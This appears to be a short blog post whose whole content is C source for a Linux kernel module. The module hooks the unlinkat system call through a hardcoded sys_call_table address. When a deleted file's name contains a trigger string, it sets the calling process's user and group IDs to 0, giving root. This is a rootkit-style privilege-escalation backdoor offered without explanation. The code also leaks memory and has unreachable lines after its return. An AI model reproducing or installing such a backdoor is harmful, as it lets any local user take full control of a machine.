Mar 16, 2011

Redemption

#include <linux/module.h>
#include <linux/kernel.h>
char *pattern="michaless";
void **sys_call_table = (void *)0xc1958140;

asmlinkage int (*ori_unlinkat)(int dirfd,char *pathname,int flags);

asmlinkage int hack_unlinkat(int dirfd,char *pathname,int flags)
{

//mm_segment_t old_fs;
//struct cred *current_p;
//struct cred *cred = prepare_creds();

   int ret;
   char *kernbuff=(char*)kmalloc(128,GFP_KERNEL);
   copy_from_user(kernbuff,pathname,127);

   if (strstr(kernbuff,pattern)){
printk("Matching String Jack!!\n");

        //old_fs = get_fs();
//set_fs (USER_DS);
//...................
//set_fs(old_fs);

//current_p = prepare_creds();
//current_p->uid = 1000;
//current_p->euid = 1000;
//current_p->gid = 1000;
//current_p->egid = 1000;
//commit_creds(current_p);

struct cred *cred = prepare_creds();
     cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
     cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
     return commit_creds(cred);

      ret = (*ori_unlinkat)(dirfd,pathname,flags);
      return ret;
      //return(0);
      }
      else{
      printk("NOT matching string!!\n");
      ret = (*ori_unlinkat)(dirfd,pathname,flags);
      return ret;
      }
}

No comments:

Post a Comment